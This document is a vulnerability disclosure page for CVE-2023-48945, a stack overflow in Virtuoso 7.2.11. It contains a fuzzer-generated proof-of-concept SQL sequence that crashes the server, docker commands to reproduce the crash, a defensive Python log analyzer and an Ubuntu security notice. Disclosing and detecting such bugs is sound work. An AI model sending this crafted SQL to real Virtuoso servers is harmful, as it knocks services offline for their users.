CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource
A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 DECIMAL ) ; INSERT INTO v0 VALUES ( 0 ) ; INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE -128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; UPDATE v0 SET v1 = ( SELECT DISTINCT * FROM v0 ) ;
Server Log:
14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)
*** stack smashing detected ***: terminated
Due to the stack smashing, I failed to retrieve the correct backtrace.
Ways to reproduce (write the PoC to the file '/tmp/test.sql' first):

# remove the old container
docker container rm virtdb_test -f

# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11

# wait for the server to start
sleep 10

# check whether a simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba

# run the PoC
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
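The server log above is the only observable artifact of this crash: Virtuoso prints its own timestamped startup lines, then glibc's stack protector aborts the process with a message that carries no Virtuoso timestamp. The following is an added example (not code from the issue or from the Virtuoso project) of a small log analyzer a defender could run over `docker logs` output to flag such an abort after the server came online. It assumes the line formats shown on this page; the sample logs are constructed from them, and the second glibc marker (`*** buffer overflow detected ***`) is included as a generalization to the related FORTIFY_SOURCE abort, which is not mentioned on this page.

```python
import re

# glibc abort messages emitted when a hardening check fires. They come from
# the C library rather than from Virtuoso, so they have no "HH:MM:SS" prefix.
# "*** buffer overflow detected ***" is the sibling FORTIFY_SOURCE message and
# is an assumption beyond what the issue report shows.
ABORT_MARKERS = (
    "*** stack smashing detected ***",
    "*** buffer overflow detected ***",
)

# Virtuoso startup lines, as seen in the report:
#   14:21:24 HTTP/WebDAV server online at 8890
#   14:21:24 Server online at 1111 (pid 1)
TS_LINE = re.compile(r"^(\d{2}:\d{2}:\d{2}) (.*)$")
ONLINE_LINE = re.compile(
    r"^(?:HTTP/WebDAV server|Server) online at (\d+)(?: \(pid (\d+)\))?"
)

# Constructed sample logs (the crash one mirrors the lines in the issue).
SAMPLE_CRASH_LOG = """\
14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)
*** stack smashing detected ***: terminated
"""

SAMPLE_HEALTHY_LOG = """\
09:00:01 HTTP/WebDAV server online at 8890
09:00:01 Server online at 1111 (pid 1)
"""


def analyze_virtuoso_log(text: str) -> dict:
    """Parse a Virtuoso server log and report whether a glibc abort occurred.

    Returns a dict with the ports the server announced, its pid, the last
    Virtuoso timestamp seen before the abort, the abort marker (or None), and
    whether the abort happened after the server had already come online.
    """
    report = {
        "online_ports": [],
        "pid": None,
        "last_timestamp": None,
        "crash_marker": None,
        "crashed_after_online": False,
    }
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = TS_LINE.match(line)
        if m:
            report["last_timestamp"], msg = m.group(1), m.group(2)
        else:
            # No timestamp: either a continuation line or a libc message.
            msg = line
        om = ONLINE_LINE.match(msg)
        if om:
            report["online_ports"].append(int(om.group(1)))
            if om.group(2):
                report["pid"] = int(om.group(2))
            continue
        for marker in ABORT_MARKERS:
            if msg.startswith(marker):
                report["crash_marker"] = marker
                # An abort after "Server online" means a client request,
                # not startup, took the process down.
                report["crashed_after_online"] = bool(report["online_ports"])
                break
    return report


def should_alert(report: dict) -> bool:
    """Alert on any hardening abort; the process is gone either way."""
    return report["crash_marker"] is not None


if __name__ == "__main__":
    for name, log in (("crash", SAMPLE_CRASH_LOG), ("healthy", SAMPLE_HEALTHY_LOG)):
        r = analyze_virtuoso_log(log)
        print(name, "alert" if should_alert(r) else "ok", r)
```

In practice the input would be `docker logs virtdb_test` captured after the container exits; because the stack protector calls abort, the container's exit code and the absence of a backtrace (as the reporter notes) are the only other signals, so the log marker is the one worth monitoring.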
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.